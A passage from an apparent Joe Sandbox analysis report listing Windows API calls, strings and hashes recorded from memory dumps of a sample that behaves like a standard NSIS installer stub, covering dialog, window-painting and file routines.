                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: {
                                                                                                            • API String ID: 590372296-366298937
                                                                                                            • Opcode ID: 40d8ee56fed0ff9bd7faebda229d010c99ca55f69e8b7427a9ca7d215ef8d0f7
                                                                                                            • Instruction ID: 9fa9afbe460ba73b362fbd7a7e80f39848d7c2b38d0fa32ac3ffaaa5a75fb061
                                                                                                            • Opcode Fuzzy Hash: 40d8ee56fed0ff9bd7faebda229d010c99ca55f69e8b7427a9ca7d215ef8d0f7
                                                                                                            • Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
                                                                                                            • ShowWindow.USER32(?), ref: 00403CB0
                                                                                                            • DestroyWindow.USER32 ref: 00403CC4
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403D01
                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403D1C
                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403DCA
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403DD4
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403EE5
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403F06
                                                                                                            • EnableWindow.USER32(?,?), ref: 00403F18
                                                                                                            • EnableWindow.USER32(?,?), ref: 00403F33
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 00403F50
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
                                                                                                            • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
                                                                                                            • SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 004040EC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 184305955-0
                                                                                                            • Opcode ID: bcef63d1befa62095ffb28f8decf7ccef4978ac163dab3c6641283cf9af83911
                                                                                                            • Instruction ID: 25e1393ee42f6df426570fd4a537ecf3dcaf9ce603c4882d15cf919a8637c385
                                                                                                            • Opcode Fuzzy Hash: bcef63d1befa62095ffb28f8decf7ccef4978ac163dab3c6641283cf9af83911
                                                                                                            • Instruction Fuzzy Hash: 2FC1A071A08205BBDB206F61ED49E3B3A68FB89745F40053EF601B15F1CB799852DB2E
                                                                                                            APIs
                                                                                                              • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                              • Part of subcall function 00406254: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                              • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                            • lstrcatW.KERNEL32(00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800,774D3420,00000000,00434000), ref: 00403935
                                                                                                            • lstrlenW.KERNEL32(00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800), ref: 004039B5
                                                                                                            • lstrcmpiW.KERNEL32(00427178,.exe,00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
                                                                                                            • GetFileAttributesW.KERNEL32(00427180), ref: 004039D3
                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A1C
                                                                                                              • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                            • RegisterClassW.USER32(00428180), ref: 00403A59
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403ADC
                                                                                                            • LoadLibraryW.KERNEL32(RichEd20), ref: 00403AED
                                                                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
                                                                                                            • RegisterClassW.USER32(00428180), ref: 00403B1E
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 914957316-1115850852
                                                                                                            • Opcode ID: d0fa4835c9c244ef81a80b769fa25e5675a0a47ce1ec59f3ecf61db25a6a7c64
                                                                                                            • Instruction ID: b862c1471ebdc097eb7bd7ac0b5924faedec86185335dcace1f032bfb9465ac2
                                                                                                            • Opcode Fuzzy Hash: d0fa4835c9c244ef81a80b769fa25e5675a0a47ce1ec59f3ecf61db25a6a7c64
                                                                                                            • Instruction Fuzzy Hash: 5561B670604201BAE720AF669C46E3B3A6CEB45759F40453FF945B62E2CB786D02CA2D
                                                                                                            APIs
                                                                                                            • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C18
                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
                                                                                                            • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
                                                                                                              • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                              • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                            • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
                                                                                                            • wsprintfA.USER32 ref: 00405C80
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
                                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405D71
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405D78
                                                                                                              • Part of subcall function 00405B56: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405B5A
                                                                                                              • Part of subcall function 00405B56: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                            • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                                                                            • API String ID: 1265525490-3322868524
                                                                                                            • Opcode ID: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                                                                            • Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
                                                                                                            • Opcode Fuzzy Hash: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
                                                                                                            • Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectW.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
• Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
• Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
• Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
APIs
• GetDlgItem.USER32(?,000003FB), ref: 00404619
• SetWindowTextW.USER32(00000000,?), ref: 00404643
• SHBrowseForFolderW.SHELL32(?), ref: 004046F4
• CoTaskMemFree.OLE32(00000000), ref: 004046FF
• lstrcmpiW.KERNEL32(00427180,004226D0,00000000,?,?), ref: 00404731
• lstrcatW.KERNEL32(?,00427180), ref: 0040473D
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
  • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
  • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,774D3420,00403512), ref: 004061E1
  • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
  • Part of subcall function 0040617E: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,774D3420,00403512), ref: 004061F5
  • Part of subcall function 0040617E: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,774D3420,00403512), ref: 00406208
• GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
• SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
Strings
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
• String ID: A
• API String ID: 2246997448-3554254475
• Opcode ID: 261e2510cd1b5ee8e3ef4165168ab5b045fd3ecf1d6b5ad41c9e26fd8e997a92
• Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
• Opcode Fuzzy Hash: 261e2510cd1b5ee8e3ef4165168ab5b045fd3ecf1d6b5ad41c9e26fd8e997a92
• Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
APIs
• GetTickCount.KERNEL32 ref: 00402DD0
• GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
  • Part of subcall function 00405B56: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405B5A
  • Part of subcall function 00405B56: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
• GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
• GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7C
Strings
• Inst, xrefs: 00402EA3
• soft, xrefs: 00402EAC
• Null, xrefs: 00402EB5
• Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
• Error launching installer, xrefs: 00402E0C
• Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
Similarity
• API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
• String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
• API String ID: 2803837635-787788815
• Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
• Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
• Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
• Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C
APIs
• GetVersion.KERNEL32(00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00405FCF
• GetSystemDirectoryW.KERNEL32(00427180,00000400), ref: 0040604D
• GetWindowsDirectoryW.KERNEL32(00427180,00000400), ref: 00406060
• SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
• SHGetPathFromIDListW.SHELL32(?,00427180), ref: 004060AA
• CoTaskMemFree.OLE32(?), ref: 004060B5
• lstrcatW.KERNEL32(00427180,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
• lstrlenW.KERNEL32(00427180,00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00406133
Strings
• \Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D3
• Software\Microsoft\Windows\CurrentVersion, xrefs: 0040601B
Similarity
• API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
• String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 900638850-730719616
• Opcode ID: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
• Instruction ID: 201fcfe404e7502d8ff22bbbb8bc1db0d7d07a9235330109bbd625d5d43c8b09
• Opcode Fuzzy Hash: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
• Instruction Fuzzy Hash: 93612371A40516EBDB209F24CC44AAF37A5EF00314F51813BE546BA2E0D73D8AA2CB4E
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
• GetDlgItem.USER32(?,000003E8), ref: 0040437E
• SendMessageW.USER32(00000000,0000045B,00000001), ref: 0040439B
• GetSysColor.USER32(?), ref: 004043AC
• SendMessageW.USER32(00000000,00000443,?,?), ref: 004043BA
• SendMessageW.USER32(00000000,00000445,?,04010000), ref: 004043C8
• lstrlenW.KERNEL32(?,?,04010000,?,?,?,00000000), ref: 004043CD
• SendMessageW.USER32(00000000,00000435,?,00000000), ref: 004043DA
• SendMessageW.USER32(00000000,00000449,?,?), ref: 004043EF
Similarity
• API ID: MessageSend$ButtonCheckColorItemlstrlen
• String ID:
• API String ID: 1008850623-0
• Opcode ID: 11b25a5882e482cc4bb954ceb8ac25c4d956a406a47e3dc3acd2e145a1a4205b
• Instruction ID: 6404b5b34e5ce3e62085b934271d78e479a703510769b93e2f3efd78726f1448
• Opcode Fuzzy Hash: 11b25a5882e482cc4bb954ceb8ac25c4d956a406a47e3dc3acd2e145a1a4205b
• Instruction Fuzzy Hash: D331A0B1A00109BFDB01AF64DD85A7D3BA9FB44744F00407AFA05FB2A0D7799E62DB58
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 004041B3
• GetSysColor.USER32(00000000), ref: 004041CF
• SetTextColor.GDI32(?,00000000), ref: 004041DB
• SetBkMode.GDI32(?,?), ref: 004041E7
• GetSysColor.USER32(?), ref: 004041FA
• SetBkColor.GDI32(?,?), ref: 0040420A
• DeleteObject.GDI32(?), ref: 00404224
• CreateBrushIndirect.GDI32(?), ref: 0040422E
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
• Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
• Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
• Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
APIs
• ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
• MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
• SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
• MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
  • Part of subcall function 00405BD9: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
  • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
Strings
                                                                                                            Similarity
                                                                                                            • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 1149667376-2366072709
                                                                                                            • Opcode ID: 5bf3696fc1b43342bc1c7e4b21794d67987bb543e605c58fae928a8d5a7d4e33
                                                                                                            • Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
                                                                                                            • Opcode Fuzzy Hash: 5bf3696fc1b43342bc1c7e4b21794d67987bb543e605c58fae928a8d5a7d4e33
                                                                                                            • Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69
APIs
• lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
• lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
• lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
• SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
• SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
Memory Dump Source
• Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID:
• API String ID: 2531174081-0
• Opcode ID: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
• Instruction ID: f08454111491fc0d39351af24b8902c1f97f976603b555b028d64c931b302e29
• Opcode Fuzzy Hash: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
• Instruction Fuzzy Hash: 42219D71900518BACB119FA5DD84ADFBFB8EF44354F54807AF904B62A0C7798A41DFA8
APIs
• DestroyWindow.USER32(?,00000000), ref: 00402D35
• GetTickCount.KERNEL32 ref: 00402D53
• wsprintfW.USER32 ref: 00402D81
  • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
  • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
  • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
  • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
• CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
• ShowWindow.USER32(00000000,00000005), ref: 00402DB3
  • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
Strings
Memory Dump Source
• Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
• String ID: ... %d%%
• API String ID: 722711167-2449383134
• Opcode ID: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
• Instruction ID: 10fb19a6c4b2eae8d62923eb178f02f9fc5b3c6af7becd3ce095817841e91703
• Opcode Fuzzy Hash: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
• Instruction Fuzzy Hash: 2901A130949220EBD7626B60AF1DAEA3B68EF01704F1445BBF901B11E0C6FC9D01CA9E
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
• GetMessagePos.USER32 ref: 00404A81
• ScreenToClient.USER32(?,?), ref: 00404A9B
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
Strings
Memory Dump Source
• Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
• Instruction ID: cab112d5f89b67c13374b27971796476edbf79a01bfb7ffc6895eaaae0ed81f2
• Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
• Instruction Fuzzy Hash: 1C014C71E40219BADB00DB94DD85BFEBBB8AB55715F10012ABB11B61C0C7B4A9018BA5
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
• wsprintfW.USER32 ref: 00402CD1
